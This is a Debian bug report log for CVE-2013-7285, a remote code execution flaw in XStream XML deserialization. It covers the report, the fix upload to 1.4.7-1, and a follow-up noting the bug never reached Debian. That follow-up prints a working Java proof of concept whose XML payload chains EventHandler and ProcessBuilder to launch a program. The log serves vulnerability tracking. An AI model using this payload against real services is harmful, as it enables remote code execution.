Debian Bug report logs -
#734821
libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream
Reported by: Salvatore Bonaccorso <carnil@debian.org>
Date: Fri, 10 Jan 2014 02:54:02 UTC
Severity: grave
Tags: security, upstream
Done: Emmanuel Bourg <ebourg@apache.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>
:
Bug#734821
; Package libxstream-java
.
(Fri, 10 Jan 2014 02:54:06 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>
:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>
.
(Fri, 10 Jan 2014 02:54:06 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: libxstream-java
Severity: grave
Tags: security upstream
Hi,
the following vulnerability was published for libxstream-java.
CVE-2013-7285[0]:
remote code execution via deserialization in XStream
See also [1] for the original report. [3] contains an initial patch
which was commited.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7285
http://security-tracker.debian.org/tracker/CVE-2013-7285
[1] http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
[2] http://markmail.org/message/kfqoqdfj5fnup5co?q=list:org.codehaus.xstream.dev&page=3
[3] https://fisheye.codehaus.org/changelog/xstream?cs=2210
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
Reply sent
to Emmanuel Bourg <ebourg@apache.org>
:
You have taken responsibility.
(Wed, 12 Mar 2014 13:36:23 GMT) (full text, mbox, link).
Notification sent
to Salvatore Bonaccorso <carnil@debian.org>
:
Bug acknowledged by developer.
(Wed, 12 Mar 2014 13:36:23 GMT) (full text, mbox, link).
Message #10 received at 734821-close@bugs.debian.org (full text, mbox, reply):
Source: libxstream-java
Source-Version: 1.4.7-1
We believe that the bug you reported is fixed in the latest version of
libxstream-java, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 734821@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Emmanuel Bourg <ebourg@apache.org> (supplier of updated libxstream-java package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Wed, 12 Mar 2014 14:06:33 +0100
Source: libxstream-java
Binary: libxstream-java
Architecture: source all
Version: 1.4.7-1
Distribution: unstable
Urgency: low
Maintainer: Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>
Changed-By: Emmanuel Bourg <ebourg@apache.org>
Description:
libxstream-java - Java library to serialize objects to XML and back again
Closes: 734821
Changes:
libxstream-java (1.4.7-1) unstable; urgency=low
.
* New upstream release
- Fixes CVE-2013-7285 (Closes: #734821)
- Added a dependency on libjdom2-java
* Standards-Version updated to 3.9.5 (no changes)
* Use XZ compression for the upstream tarball
* Build depend on debhelper >= 9
* debian/copyright: Updated to the Copyright Format 1.0
Checksums-Sha1:
684b6cc0d8edae45924832e4eedda12c780cb624 2343 libxstream-java_1.4.7-1.dsc
329882aa8cb64b0ec729d840453a27608f59aba1 397328 libxstream-java_1.4.7.orig.tar.xz
243eb22bca15817712111ca2645a867377ef2a8e 5960 libxstream-java_1.4.7-1.debian.tar.xz
a41e3fee90ff5d6361d0538a84ea8afdcf32e33d 583860 libxstream-java_1.4.7-1_all.deb
Checksums-Sha256:
8698da0a6520f6ab54efadad2e98c5d5e51f37faf0506b155208db85304bc3f2 2343 libxstream-java_1.4.7-1.dsc
33aeb2217d2dd3734abcd6cc6f3d3283fed2646e4cbc79102d5237a099738eed 397328 libxstream-java_1.4.7.orig.tar.xz
08c314aa33cb9164620110466cbe106369aedcc1e8718f1551bcce347c63004a 5960 libxstream-java_1.4.7-1.debian.tar.xz
5a191aa57415acd1c5fb2f6af53ea7f751c615abb8bf9b00a9070f58cb19d322 583860 libxstream-java_1.4.7-1_all.deb
Files:
c8d6431cf68e71eda78e67e950e079aa 2343 java optional libxstream-java_1.4.7-1.dsc
09de7d2175bdc6c002aa681e3004d8d6 397328 java optional libxstream-java_1.4.7.orig.tar.xz
3e72fa42334aaed7ec2248a9ffd3ccf1 5960 java optional libxstream-java_1.4.7-1.debian.tar.xz
72573fdd9319ffae8b1d9dafd65e2c02 583860 java optional libxstream-java_1.4.7-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBAgAGBQJTIF7aAAoJEPUTxBnkudCs+a4P/j+JXVoQeggxQ7CJUNrv/9Gr
XkGmG2ggPugGcdFcQ+VcMNwNHLoQc+kjgPUJltfoFR2SdXXtyj25ObZMfNKIe1Kk
yeospGr9CbGXwwCLLn30HFX/jPSxizcGMn9LecFtw5K0zgjlxR/lJBAwml/0hHmE
vHQ1u1rUCique6HbZYWakuJDp8bY9q+XrRxYJIWIKUNnWKJnp1c/Kch4siBw9XF5
gpAnuAVNpPJ5BdWElRh84GauSOxmiZdt3vIYYu9LO1CaVjcNStck1F9MYDjHLnYU
hjRv+0wOyTsNBsgDwGm7pvkc0MF3y05v/rxcS1yw9FVkP7aBk6I8owqgz+DQaQRN
CfvZSdAJTbsA9UtnCgsi5XMCx6G0BQSjRNjWfOtEvbzZ2ybFn7igMbJFoS7jATvF
lJZhWeT5rFPR5PnjZU3eHukO1Jp/o+2yjRdyfAuuDh83+LCFj87n8W+aCQ5PbHdS
lYxHPxQ/4+Bg1lH0Od9ddTMpixNY1OS4vPviUT3OvtUsXj3Rv2YkqwrWiNcuw+0v
fhBzRtC2nXBWcBfJ+T96V8GTPYxRX8dYzEAo+hU5ckqkfRU+a0uMfZBw7ygF8xBf
KD/7ZZxMqgDNFK3RYHyzJdOraNbWA8zhnlfFjrMfEJ1q6z9gNv8d94dZiKFYxJ8f
+Rnu7yy6ohjBobID97WK
=0TkV
-----END PGP SIGNATURE-----
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>
:
Bug#734821
; Package libxstream-java
.
(Fri, 10 Oct 2014 09:21:14 GMT) (full text, mbox, link).
Acknowledgement sent
to Sébastien Delafond <seb@debian.org>
:
Extra info received and forwarded to list. Copy sent to Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>
.
(Fri, 10 Oct 2014 09:21:14 GMT) (full text, mbox, link).
Message #15 received at 734821@bugs.debian.org (full text, mbox, reply):
notfixed 734821 1.4.7-1
thanks
This bug was actually never in Debian, since it was introduced in 1.4.5
and closed in 1.4.7.
If anyone is interested in verifying this, the following code can be run
against the JARs present at
http://repo.maven.apache.org/maven2/com/thoughtworks/xstream/xstream/:
import java.io.IOException;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
/* Thanks to </pwntester> for the PoC
* http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ */
public class XStreamExploit {
public static void main(String[] args) throws IOException {
String process = "/usr/bin/xeyes";
String payload = "<sorted-set>" +
"<string>foo</string>" +
"<dynamic-proxy>" +
"<interface>java.lang.Comparable</interface>" +
"<handler class=\"java.beans.EventHandler\">" +
" <target class=\"java.lang.ProcessBuilder\">" +
" <command>" +
" <string>" + process + "</string>" +
" </command>" +
" </target>" +
" <action>start</action>" +
"</handler>" +
"</dynamic-proxy>" +
"</sorted-set>";
XStream xstream = new XStream(new DomDriver());
xstream.fromXML(payload);
}
}
Cheers,
--Seb
No longer marked as fixed in versions libxstream-java/1.4.7-1.
Request was from Sébastien Delafond <seb@debian.org>
to control@bugs.debian.org
.
(Fri, 10 Oct 2014 09:21:22 GMT) (full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org
.
(Sat, 08 Nov 2014 07:26:44 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 16:41:24 2019;
Machine Name:
beach
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.